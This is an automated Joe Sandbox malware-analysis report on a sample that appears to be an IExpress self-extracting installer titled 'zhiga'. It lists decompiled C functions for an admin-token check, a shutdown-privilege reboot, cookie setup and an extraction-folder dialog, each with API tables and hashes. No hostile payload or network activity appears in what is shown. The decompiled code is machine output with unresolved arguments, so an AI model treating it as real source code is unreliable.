                                                          0x010c18a3
                                                          0x010c18a3
                                                          0x010c18ab
                                                          0x010c18b2
                                                          0x010c18b5
                                                          0x010c18be
                                                          0x010c18c0
                                                          0x010c18c6
                                                          0x010c18c7
                                                          0x010c18ca
                                                          0x010c18cf
                                                          0x010c19c9
                                                          0x010c19d8
                                                          0x010c19d8
                                                          0x010c18df
                                                          0x010c19b8
                                                          0x010c19bd
                                                          0x010c19bf
                                                          0x010c19bf
                                                          0x00000000
                                                          0x010c19bd
                                                          0x010c18fa
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1912
                                                          0x010c19aa
                                                          0x010c19ad
                                                          0x010c19b3
                                                          0x00000000
                                                          0x010c1927
                                                          0x010c1927
                                                          0x010c1932
                                                          0x010c1936
                                                          0x010c19a9
                                                          0x010c19a9
                                                          0x00000000
                                                          0x010c19a9
                                                          0x010c194c
                                                          0x010c19a2
                                                          0x010c19a3
                                                          0x00000000
                                                          0x010c196e
                                                          0x010c1970
                                                          0x010c1999
                                                          0x010c199c
                                                          0x00000000
                                                          0x010c199c
                                                          0x010c1972
                                                          0x010c1972
                                                          0x010c1975
                                                          0x010c1984
                                                          0x010c1985
                                                          0x010c198a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c198c
                                                          0x010c1991
                                                          0x010c1996
                                                          0x00000000
                                                          0x010c1996
                                                          0x010c194c

                                                          APIs
                                                            • Part of subcall function 010C17EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,010C18DD), ref: 010C181A
                                                            • Part of subcall function 010C17EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 010C182C
                                                            • Part of subcall function 010C17EE: AllocateAndInitializeSid.ADVAPI32(010C18DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,010C18DD), ref: 010C1855
                                                            • Part of subcall function 010C17EE: FreeSid.ADVAPI32(?,?,?,?,010C18DD), ref: 010C1883
                                                            • Part of subcall function 010C17EE: FreeLibrary.KERNEL32(00000000,?,?,?,010C18DD), ref: 010C188A
                                                          • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 010C18EB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010C18F2
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 010C190A
                                                          • GetLastError.KERNEL32 ref: 010C1918
                                                          • LocalAlloc.KERNEL32(00000000,?,?), ref: 010C192C
                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 010C1944
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 010C1964
                                                          • EqualSid.ADVAPI32(00000004,?), ref: 010C197A
                                                          • FreeSid.ADVAPI32(?), ref: 010C199C
                                                          • LocalFree.KERNEL32(00000000), ref: 010C19A3
                                                          • CloseHandle.KERNEL32(?), ref: 010C19AD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                          • String ID:
                                                          • API String ID: 2168512254-0
                                                          • Opcode ID: 18869c3c050264640d2d04029292c705c4f209a5582c38e23ad7279273536ec1
                                                          • Instruction ID: bb52c257ad3eea1c7fcc367180508a0f05145595d0ab2a253fcc98a6dc8a52ba
                                                          • Opcode Fuzzy Hash: 18869c3c050264640d2d04029292c705c4f209a5582c38e23ad7279273536ec1
                                                          • Instruction Fuzzy Hash: 39312A71A00209EFDB609FA5DC48AEFBBBCFF44B40F204469F685D2145E73699049F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E010C1F90(signed int __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				signed int _t13;
                                                          				int _t21;
                                                          				void* _t25;
                                                          				int _t28;
                                                          				signed char _t30;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				void* _t41;
                                                          				signed int _t46;
                                                          
                                                          				_t41 = __esi;
                                                          				_t38 = __edi;
                                                          				_t30 = __ecx;
                                                          				if((__ecx & 0x00000002) != 0) {
                                                          					L12:
                                                          					if((_t30 & 0x00000004) != 0) {
                                                          						L14:
                                                          						if( *0x10c9a40 != 0) {
                                                          							_pop(_t30);
                                                          							_t44 = _t46;
                                                          							_t13 =  *0x10c8004; // 0x4b13cf70
                                                          							_v8 = _t13 ^ _t46;
                                                          							_push(_t38);
                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                          								_v24.PrivilegeCount = 1;
                                                          								_v12 = 2;
                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                          								CloseHandle(_v28);
                                                          								_t41 = _t41;
                                                          								_push(0);
                                                          								if(_t21 != 0) {
                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                          										_t25 = 1;
                                                          									} else {
                                                          										_t37 = 0x4f7;
                                                          										goto L3;
                                                          									}
                                                          								} else {
                                                          									_t37 = 0x4f6;
                                                          									goto L4;
                                                          								}
                                                          							} else {
                                                          								_t37 = 0x4f5;
                                                          								L3:
                                                          								_push(0);
                                                          								L4:
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E010C44B9(0, _t37);
                                                          								_t25 = 0;
                                                          							}
                                                          							_pop(_t40);
                                                          							return E010C6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                          						} else {
                                                          							_t28 = ExitWindowsEx(2, 0);
                                                          							goto L16;
                                                          						}
                                                          					} else {
                                                          						_t37 = 0x522;
                                                          						_t28 = E010C44B9(0, 0x522, 0x10c1140, 0, 0x40, 4);
                                                          						if(_t28 != 6) {
                                                          							goto L16;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					__eax = E010C1EA7(__ecx);
                                                          					if(__eax != 2) {
                                                          						L16:
                                                          						return _t28;
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          			}

















                                                          0x010c1f90
                                                          0x010c1f90
                                                          0x010c1f93
                                                          0x010c1f98
                                                          0x010c1fa4
                                                          0x010c1fa7
                                                          0x010c1fc5
                                                          0x010c1fcd
                                                          0x010c1fdb
                                                          0x010c1ee5
                                                          0x010c1eea
                                                          0x010c1ef1
                                                          0x010c1ef4
                                                          0x010c1f0c
                                                          0x010c1f2e
                                                          0x010c1f3a
                                                          0x010c1f46
                                                          0x010c1f4d
                                                          0x010c1f58
                                                          0x010c1f60
                                                          0x010c1f61
                                                          0x010c1f62
                                                          0x010c1f75
                                                          0x010c1f80
                                                          0x010c1f77
                                                          0x010c1f77
                                                          0x00000000
                                                          0x010c1f77
                                                          0x010c1f64
                                                          0x010c1f64
                                                          0x00000000
                                                          0x010c1f64
                                                          0x010c1f0e
                                                          0x010c1f0e
                                                          0x010c1f13
                                                          0x010c1f13
                                                          0x010c1f14
                                                          0x010c1f14
                                                          0x010c1f16
                                                          0x010c1f17
                                                          0x010c1f1a
                                                          0x010c1f1f
                                                          0x010c1f1f
                                                          0x010c1f86
                                                          0x010c1f8f
                                                          0x010c1fcf
                                                          0x010c1fd3
                                                          0x00000000
                                                          0x010c1fd3
                                                          0x010c1fa9
                                                          0x010c1fb4
                                                          0x010c1fbb
                                                          0x010c1fc3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1fc3
                                                          0x010c1f9a
                                                          0x010c1f9a
                                                          0x010c1fa2
                                                          0x010c1fd9
                                                          0x010c1fda
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c1fa2

                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010C1EFB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 010C1F02
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 010C1FD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2795981589-3733053543
                                                          • Opcode ID: 71a44dc21e15a54ae6cb65c4c049e5225a6da921cc3fd8078f5e658fbf1135b0
                                                          • Instruction ID: 3f1daa4911131172c41b886d44901991dedd89f319864bdbfd6676f79a25117a
                                                          • Opcode Fuzzy Hash: 71a44dc21e15a54ae6cb65c4c049e5225a6da921cc3fd8078f5e658fbf1135b0
                                                          • Instruction Fuzzy Hash: 5221B671B40206EBDB315BA59C49FBF76B8EB85F50F20001DFA82D6186D77984029F61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C7176(signed int __eax, void* __edi, signed int __esi) {
                                                          				signed int _t32;
                                                          				signed int _t33;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				signed int _t38;
                                                          				void* _t40;
                                                          
                                                          				_t38 = __esi;
                                                          				_t36 = __edi;
                                                          				if(__eax == __edi || (__esi & __eax) == 0) {
                                                          					GetSystemTimeAsFileTime(_t40 - 0xc);
                                                          					 *(_t40 - 4) =  *(_t40 - 8) ^  *(_t40 - 0xc);
                                                          					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentProcessId();
                                                          					 *(_t40 - 4) =  *(_t40 - 4) ^ GetCurrentThreadId();
                                                          					 *(_t40 - 4) = GetTickCount() ^  *(_t40 - 4) ^ _t40 - 0x00000004;
                                                          					QueryPerformanceCounter(_t40 - 0x14);
                                                          					_t32 =  *(_t40 - 0x10) ^  *(_t40 - 0x14) ^  *(_t40 - 4);
                                                          					_t35 = _t32;
                                                          					if(_t32 == _t36 || ( *0x10c8004 & _t38) == 0) {
                                                          						_t32 = 0xbb40e64f;
                                                          						_t35 = 0xbb40e64f;
                                                          					}
                                                          					 *0x10c8004 = _t35;
                                                          				}
                                                          				_t33 =  !_t32;
                                                          				 *0x10c8008 = _t33;
                                                          				return _t33;
                                                          			}









                                                          0x010c7176
                                                          0x010c7176
                                                          0x010c7178
                                                          0x010c7182
                                                          0x010c718e
                                                          0x010c7197
                                                          0x010c71a0
                                                          0x010c71b1
                                                          0x010c71b8
                                                          0x010c71c4
                                                          0x010c71c7
                                                          0x010c71cb
                                                          0x010c71d5
                                                          0x010c71da
                                                          0x010c71da
                                                          0x010c71dc
                                                          0x010c71dc
                                                          0x010c71e2
                                                          0x010c71e5
                                                          0x010c71ee

                                                          APIs
                                                          • GetSystemTimeAsFileTime.KERNEL32(?), ref: 010C7182
                                                          • GetCurrentProcessId.KERNEL32 ref: 010C7191
                                                          • GetCurrentThreadId.KERNEL32 ref: 010C719A
                                                          • GetTickCount.KERNEL32 ref: 010C71A3
                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 010C71B8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                          • String ID:
                                                          • API String ID: 1445889803-0
                                                          • Opcode ID: 05b51f402044c204c72c232ee06290cf86104c17117685c4b291898dfa30b92b
                                                          • Instruction ID: 4aa01e108f2a68efd3e2c1f71cd146095532192d55fc6abb9d4398f0b0318978
                                                          • Opcode Fuzzy Hash: 05b51f402044c204c72c232ee06290cf86104c17117685c4b291898dfa30b92b
                                                          • Instruction Fuzzy Hash: BB01C870E01208DFCB65DFB8D64859EB7F5FF88644B61499AE845E7204E7399A009F04
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				UnhandledExceptionFilter(_a4);
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}



                                                          0x010c6cf7
                                                          0x010c6d00
                                                          0x010c6d19

                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010C6E26,010C1000), ref: 010C6CF7
                                                          • UnhandledExceptionFilter.KERNEL32(010C6E26,?,010C6E26,010C1000), ref: 010C6D00
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,010C6E26,010C1000), ref: 010C6D0B
                                                          • TerminateProcess.KERNEL32(00000000,?,010C6E26,010C1000), ref: 010C6D12
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID:
                                                          • API String ID: 3231755760-0
                                                          • Opcode ID: 74491d289cd8b013c2e42dabad2a0f1820547fdb2385950b5ec1fd869d26200b
                                                          • Instruction ID: 5fe4eff579892baca2c29e5fa1770b1d2dbfd3e8837245132917cf009e766aae
                                                          • Opcode Fuzzy Hash: 74491d289cd8b013c2e42dabad2a0f1820547fdb2385950b5ec1fd869d26200b
                                                          • Instruction Fuzzy Hash: 86D0C93220010CFFDB202BF1E80CA593F28EBC8292F454000FB59C3044EA3B44518F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E010C3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* _t6;
                                                          				void* _t10;
                                                          				int _t20;
                                                          				int _t21;
                                                          				int _t23;
                                                          				char _t24;
                                                          				long _t25;
                                                          				int _t27;
                                                          				int _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				int _t34;
                                                          				int _t37;
                                                          				int _t38;
                                                          				int _t39;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				CHAR* _t49;
                                                          				void* _t58;
                                                          				void* _t63;
                                                          				struct HWND__* _t64;
                                                          
                                                          				_t64 = _a4;
                                                          				_t6 = _a8 - 0x10;
                                                          				if(_t6 == 0) {
                                                          					_push(0);
                                                          					L38:
                                                          					EndDialog(_t64, ??);
                                                          					L39:
                                                          					__eflags = 1;
                                                          					return 1;
                                                          				}
                                                          				_t42 = 1;
                                                          				_t10 = _t6 - 0x100;
                                                          				if(_t10 == 0) {
                                                          					E010C43D0(_t64, GetDesktopWindow());
                                                          					SetWindowTextA(_t64, "zhiga");
                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                          					__eflags =  *0x10c9a40 - _t42; // 0x3
                                                          					if(__eflags == 0) {
                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                          					}
                                                          					L36:
                                                          					return _t42;
                                                          				}
                                                          				if(_t10 == _t42) {
                                                          					_t20 = _a12 - 1;
                                                          					__eflags = _t20;
                                                          					if(_t20 == 0) {
                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10c91e4, 0x104);
                                                          						__eflags = _t21;
                                                          						if(_t21 == 0) {
                                                          							L32:
                                                          							_t58 = 0x4bf;
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L25:
                                                          							E010C44B9(_t64, _t58);
                                                          							goto L39;
                                                          						}
                                                          						_t49 = 0x10c91e4;
                                                          						do {
                                                          							_t23 =  *_t49;
                                                          							_t49 =  &(_t49[1]);
                                                          							__eflags = _t23;
                                                          						} while (_t23 != 0);
                                                          						__eflags = _t49 - 0x10c91e5 - 3;
                                                          						if(_t49 - 0x10c91e5 < 3) {
                                                          							goto L32;
                                                          						}
                                                          						_t24 =  *0x10c91e5; // 0x3a
                                                          						__eflags = _t24 - 0x3a;
                                                          						if(_t24 == 0x3a) {
                                                          							L21:
                                                          							_t25 = GetFileAttributesA(0x10c91e4);
                                                          							__eflags = _t25 - 0xffffffff;
                                                          							if(_t25 != 0xffffffff) {
                                                          								L26:
                                                          								E010C658A(0x10c91e4, 0x104, 0x10c1140);
                                                          								_t27 = E010C58C8(0x10c91e4);
                                                          								__eflags = _t27;
                                                          								if(_t27 != 0) {
                                                          									__eflags =  *0x10c91e4 - 0x5c;
                                                          									if( *0x10c91e4 != 0x5c) {
                                                          										L30:
                                                          										_t30 = E010C597D(0x10c91e4, 1, _t64, 1);
                                                          										__eflags = _t30;
                                                          										if(_t30 == 0) {
                                                          											L35:
                                                          											_t42 = 1;
                                                          											__eflags = 1;
                                                          											goto L36;
                                                          										}
                                                          										L31:
                                                          										_t42 = 1;
                                                          										EndDialog(_t64, 1);
                                                          										goto L36;
                                                          									}
                                                          									__eflags =  *0x10c91e5 - 0x5c;
                                                          									if( *0x10c91e5 == 0x5c) {
                                                          										goto L31;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_t58 = 0x4be;
                                                          								goto L25;
                                                          							}
                                                          							_t32 = E010C44B9(_t64, 0x54a, 0x10c91e4, 0, 0x20, 4);
                                                          							__eflags = _t32 - 6;
                                                          							if(_t32 != 6) {
                                                          								goto L35;
                                                          							}
                                                          							_t33 = CreateDirectoryA(0x10c91e4, 0);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								goto L26;
                                                          							}
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0x10c91e4);
                                                          							_t58 = 0x4cb;
                                                          							goto L25;
                                                          						}
                                                          						__eflags =  *0x10c91e4 - 0x5c;
                                                          						if( *0x10c91e4 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						__eflags = _t24 - 0x5c;
                                                          						if(_t24 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						goto L21;
                                                          					}
                                                          					_t34 = _t20 - 1;
                                                          					__eflags = _t34;
                                                          					if(_t34 == 0) {
                                                          						EndDialog(_t64, 0);
                                                          						 *0x10c9124 = 0x800704c7;
                                                          						goto L39;
                                                          					}
                                                          					__eflags = _t34 != 0x834;
                                                          					if(_t34 != 0x834) {
                                                          						goto L36;
                                                          					}
                                                          					_t37 = LoadStringA( *0x10c9a3c, 0x3e8, 0x10c8598, 0x200);
                                                          					__eflags = _t37;
                                                          					if(_t37 != 0) {
                                                          						_t38 = E010C4224(_t64, _t46, _t46);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10c87a0);
                                                          						__eflags = _t39;
                                                          						if(_t39 != 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t63 = 0x4c0;
                                                          						L9:
                                                          						E010C44B9(_t64, _t63, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						goto L38;
                                                          					}
                                                          					_t63 = 0x4b1;
                                                          					goto L9;
                                                          				}
                                                          				return 0;
                                                          			}

























                                                          0x010c321b
                                                          0x010c321e
                                                          0x010c3221
                                                          0x010c343c
                                                          0x010c343e
                                                          0x010c343f
                                                          0x010c3445
                                                          0x010c3447
                                                          0x00000000
                                                          0x010c3447
                                                          0x010c3229
                                                          0x010c322a
                                                          0x010c322f
                                                          0x010c33ec
                                                          0x010c33f7
                                                          0x010c3410
                                                          0x010c3416
                                                          0x010c341d
                                                          0x010c342d
                                                          0x010c342d
                                                          0x010c3438
                                                          0x00000000
                                                          0x010c3438
                                                          0x010c3237
                                                          0x010c3243
                                                          0x010c3243
                                                          0x010c3246
                                                          0x010c32ee
                                                          0x010c32f4
                                                          0x010c32f6
                                                          0x010c33d4
                                                          0x010c33d6
                                                          0x010c33db
                                                          0x010c33dc
                                                          0x010c33de
                                                          0x010c33df
                                                          0x010c3370
                                                          0x010c3372
                                                          0x00000000
                                                          0x010c3372
                                                          0x010c32fc
                                                          0x010c3301
                                                          0x010c3301
                                                          0x010c3303
                                                          0x010c3304
                                                          0x010c3304
                                                          0x010c330a
                                                          0x010c330d
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3313
                                                          0x010c3318
                                                          0x010c331a
                                                          0x010c3331
                                                          0x010c3332
                                                          0x010c333a
                                                          0x010c333d
                                                          0x010c337c
                                                          0x010c3388
                                                          0x010c338f
                                                          0x010c3394
                                                          0x010c3396
                                                          0x010c33a4
                                                          0x010c33ab
                                                          0x010c33b6
                                                          0x010c33be
                                                          0x010c33c3
                                                          0x010c33c5
                                                          0x010c3435
                                                          0x010c3437
                                                          0x010c3437
                                                          0x00000000
                                                          0x010c3437
                                                          0x010c33c7
                                                          0x010c33c9
                                                          0x010c33cc
                                                          0x00000000
                                                          0x010c33cc
                                                          0x010c33ad
                                                          0x010c33b4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c33b4
                                                          0x010c3398
                                                          0x010c3399
                                                          0x010c339b
                                                          0x010c339c
                                                          0x010c339d
                                                          0x00000000
                                                          0x010c339d
                                                          0x010c334c
                                                          0x010c3351
                                                          0x010c3354
                                                          0x00000000
                                                          0x00000000
                                                          0x010c335c
                                                          0x010c3362
                                                          0x010c3364
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3366
                                                          0x010c3367
                                                          0x010c3369
                                                          0x010c336a
                                                          0x010c336b
                                                          0x00000000
                                                          0x010c336b
                                                          0x010c331c
                                                          0x010c3323
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3329
                                                          0x010c332b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c332b
                                                          0x010c324c
                                                          0x010c324c
                                                          0x010c324f
                                                          0x010c32c8
                                                          0x010c32ce
                                                          0x00000000
                                                          0x010c32ce
                                                          0x010c3251
                                                          0x010c3256
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3271
                                                          0x010c3277
                                                          0x010c3279
                                                          0x010c3298
                                                          0x010c329d
                                                          0x010c329f
                                                          0x00000000
                                                          0x00000000
                                                          0x010c32b0
                                                          0x010c32b6
                                                          0x010c32b8
                                                          0x00000000
                                                          0x00000000
                                                          0x010c32be
                                                          0x010c3280
                                                          0x010c3289
                                                          0x010c328e
                                                          0x00000000
                                                          0x010c328e
                                                          0x010c327b
                                                          0x00000000
                                                          0x010c327b
                                                          0x00000000

                                                          APIs
                                                          • LoadStringA.USER32(000003E8,010C8598,00000200), ref: 010C3271
                                                          • GetDesktopWindow.USER32 ref: 010C33E2
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010C33F7
                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010C3410
                                                          • GetDlgItem.USER32(?,00000836), ref: 010C3426
                                                          • EnableWindow.USER32(00000000), ref: 010C342D
                                                          • EndDialog.USER32(?,00000000), ref: 010C343F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$zhiga
                                                          • API String ID: 2418873061-1100731767
                                                          • Opcode ID: 41d6e8a13a3f246da70516abeb3a65086bcc724dac78deca60b178446781d5aa
                                                          • Instruction ID: bc2fa67891ec0a395027adfa990d2325aadd2fa1c0990f22af29c93c5677eb56
                                                          • Opcode Fuzzy Hash: 41d6e8a13a3f246da70516abeb3a65086bcc724dac78deca60b178446781d5aa
                                                          • Instruction Fuzzy Hash: 0D51E370360250BAEBB25B395C4CFBF7999BB86F54F00C02CFAC59A1C5DEA994019F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E010C2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t13;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				struct HRSRC__* _t31;
                                                          				intOrPtr _t33;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          				signed int _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				signed int _t67;
                                                          
                                                          				_t13 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t13 ^ _t67;
                                                          				_t65 = 0;
                                                          				_t66 = __ecx;
                                                          				_t48 = __edx;
                                                          				 *0x10c9a3c = __ecx;
                                                          				memset(0x10c9140, 0, 0x8fc);
                                                          				memset(0x10c8a20, 0, 0x32c);
                                                          				memset(0x10c88c0, 0, 0x104);
                                                          				 *0x10c93ec = 1;
                                                          				_t20 = E010C468F("TITLE", 0x10c9154, 0x7f);
                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                          					_t64 = 0x4b1;
                                                          					goto L32;
                                                          				} else {
                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                          					 *0x10c858c = _t27;
                                                          					SetEvent(_t27);
                                                          					_t64 = 0x10c9a34;
                                                          					if(E010C468F("EXTRACTOPT", 0x10c9a34, 4) != 0) {
                                                          						if(( *0x10c9a34 & 0x000000c0) == 0) {
                                                          							L12:
                                                          							 *0x10c9120 =  *0x10c9120 & _t65;
                                                          							if(E010C5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                          								if( *0x10c8a3a == 0) {
                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                          									if(_t31 != 0) {
                                                          										_t65 = LoadResource(_t66, _t31);
                                                          									}
                                                          									if( *0x10c8184 != 0) {
                                                          										__imp__#17();
                                                          									}
                                                          									if( *0x10c8a24 == 0) {
                                                          										_t57 = _t65;
                                                          										if(E010C36EE(_t65) == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t33 =  *0x10c9a40; // 0x3
                                                          											_t48 = 1;
                                                          											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                          												if(( *0x10c9a34 & 0x00000100) == 0 || ( *0x10c8a38 & 0x00000001) != 0 || E010C18A3(_t64, _t66) != 0) {
                                                          													goto L30;
                                                          												} else {
                                                          													_t64 = 0x7d6;
                                                          													if(E010C6517(_t57, 0x7d6, _t34, E010C19E0, 0x547, 0x83e) != 0x83d) {
                                                          														goto L33;
                                                          													} else {
                                                          														goto L30;
                                                          													}
                                                          												}
                                                          											} else {
                                                          												L30:
                                                          												_t23 = _t48;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										_t23 = 1;
                                                          									}
                                                          								} else {
                                                          									E010C2390(0x10c8a3a);
                                                          									goto L33;
                                                          								}
